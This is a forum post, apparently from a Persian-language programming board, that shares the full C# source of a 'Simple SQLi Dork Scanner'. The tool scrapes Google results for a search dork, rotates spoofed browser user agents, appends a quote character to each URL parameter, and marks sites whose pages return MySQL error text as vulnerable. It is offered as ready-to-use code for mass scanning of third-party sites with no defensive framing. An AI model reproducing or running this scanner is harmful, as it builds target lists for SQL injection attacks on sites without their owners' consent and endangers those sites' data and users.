[c#] Simple SQLi Dork Scanner
یه سورس نرم افزار اسکنر باگsql
کد PHP:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Text.RegularExpressions;
using System.Net;
using System.Web;
using System.IO;
using System.Collections.Specialized;
namespace WindowsFormsApplication1
{
public partial class Form1 : Form
{
bool unik;
public Form1()
{
InitializeComponent();
}
private string useragent()
{
string[] ua = {"Mozilla/5.0 (X11; Linux i686) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11",
"Opera/9.25 (Windows NT 5.1; U; en)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12",
"Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:50",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+2011-10-16 20:21:10",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"};
Random rand = new Random();
int i = rand.Next(0, ua.Length - 1);
string ua2 = ua[i];
return ua2;
}
private string graph(string dork, int start)
{
string data = this.curl("http://www.google.com/custom?q=" + HttpUtility.UrlEncode(dork) + "&btnG=Search&start=" + start.ToString());
return data;
}
private MatchCollection match(string start, string end, string var)
{
MatchCollection match = Regex.Matches(var, Regex.Escape(start) + "(.*?)" + Regex.Escape(end));
return match;
}
private string curl(string url_, string data = null)
{
Stream stream;
Uri url = new Uri(url_);
try
{
HttpWebRequest req = (HttpWebRequest)HttpWebRequest.Create(url);
req.Accept = "*/*";
req.Timeout = 60000;
req.UserAgent = this.useragent();
req.AllowAutoRedirect = true;
if (!string.IsNullOrEmpty(data))
{
byte[] postdata = Encoding.UTF8.GetBytes(data);
req.Method = WebRequestMethods.Http.Post;
req.ContentType = "application/x-www-form-urlencoded";
req.ContentLength = postdata.Length;
stream = (Stream)req.GetRequestStream();
stream.Write(postdata, 0, postdata.Length);
stream.Close();
}
else
{
req.Method = WebRequestMethods.Http.Get;
}
HttpWebResponse respon = (HttpWebResponse)req.GetResponse();
StreamReader mbuh = new StreamReader(respon.GetResponseStream());
string source = WebUtility.HtmlDecode(mbuh.ReadToEnd().ToString());
return source;
}
catch (Exception ex)
{
return ex.ToString();
}
}
private string[] unique(string[] arr)
{
string[] host = new string[arr.Length];
string[] scheme = new string[arr.Length];
string[] pathquery = new string[arr.Length];
for (int a = 0; a < arr.Length; a++)
{
Uri url = new Uri(arr[a]);
host[a] = url.Host;
scheme[a] = url.Scheme;
pathquery[a] = url.PathAndQuery;
}
string[] mbuh = host.Distinct().ToArray();
string[] test = new string[mbuh.Length];
int ind = 0;
IEnumerable<int> key = host.Distinct().Select(s => Array.IndexOf(host, s));
foreach (int index in key)
{
test[ind] = scheme[index] + "://" + host[index] + pathquery[index];
ind++;
}
return test;
}
private string parse(string Url)
{
Uri url = new Uri(Url);
if (string.IsNullOrEmpty(url.Query))
{
return Url;
}
if (string.IsNullOrEmpty(url.PathAndQuery))
{
return Url;
}
string query = url.Query;
string path = url.AbsolutePath;
string scheme = url.Scheme;
string host = url.Host;
string[] arr = query.Split('&');
string[] x = new string[arr.Length];
for (int a = 0; a < arr.Length; a++)
{
x[a] = arr[a].Replace(arr[a], arr[a] + HttpUtility.UrlEncode("'"));
}
string url_ = scheme + "://" + host + path + string.Join("&", x);
return url_;
}
private void button1_Click(object sender, EventArgs e)
{
if (textBox1.Text == string.Empty)
{
textBox2.Text = "Fill the dork box";
}
else
{
textBox2.Clear();
progressBar1.Minimum = 0;
progressBar1.Visible = true;
progressBar1.Value = 0;
progressBar1.Step = 1;
int total = (int)numericUpDown1.Value;
progressBar1.Maximum = total;
int start = 0;
int count = 0;
int a;
int i;
int jumSite = 10;
string data;
string pola = "<a class=\"l\" href=\"";
string[] tmp;
string urlv;
int tmp2;
int tmp3;
bool capcay=false;
MatchCollection matchs;
do
{
data = this.graph(textBox1.Text, start);
if (Regex.IsMatch(data, pola, RegexOptions.IgnoreCase))
{
matchs = this.match("<a class=\"l\" href=\"", "\" onmousedown=\"", data);
jumSite = matchs.Count;
tmp = new string[jumSite];
a = 0;
i = 0;
tmp2 = 0;
foreach (Match mbuh in matchs)
{
tmp[a] = mbuh.Groups[1].Value.ToString();
a++;
}
if (unik == true)
{
tmp = this.unique(tmp);
}
else
{
tmp = tmp;
}
tmp3 = tmp.Length;
while (count < total && tmp2 < tmp3)
{
urlv = this.parse(tmp[i]);
data = this.curl(urlv);
if (Regex.IsMatch(data, @"error in your SQL syntax|mysql_fetch_array\(\)|execute query|mysql_fetch_object\(\)|mysql_num_rows\(\)|mysql_fetch_assoc\(\)|mysql_fetch\?\?_row\(\)|SELECT \* FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error", RegexOptions.IgnoreCase))
{
textBox2.AppendText(urlv + " -> This is Vuln\r\n");
textBox3.AppendText(urlv + "\r\n");
}
else
{
textBox2.AppendText(urlv + " -> Not Vuln\r\n");
}
i++;
count++;
tmp2++;
progressBar1.PerformStep();
}
}
else
{
textBox2.AppendText("No results or there captcha authentication");
capcay = true;
}
start += 10;
} while (count < total && jumSite >= 10 && capcay==false);
progressBar1.Visible = false;
progressBar1.Value = 0;
}
}
private void Form1_Load(object sender, EventArgs e)
{
comboBox1.Items.Add("Yes");
comboBox1.Items.Add("No");
progressBar1.Visible = false;
}
private void comboBox1_SelectedIndexChanged(object sender, EventArgs e)
{
if (comboBox1.SelectedIndex == -1)
{
unik = false;
}
else if (comboBox1.SelectedIndex == 0)
{
unik = true;
}
else if (comboBox1.SelectedIndex == 1)
{
unik = false;
}
}
}
}
___________
پاسخ به:مجموعه برنامه ها به زبان سی شارپ
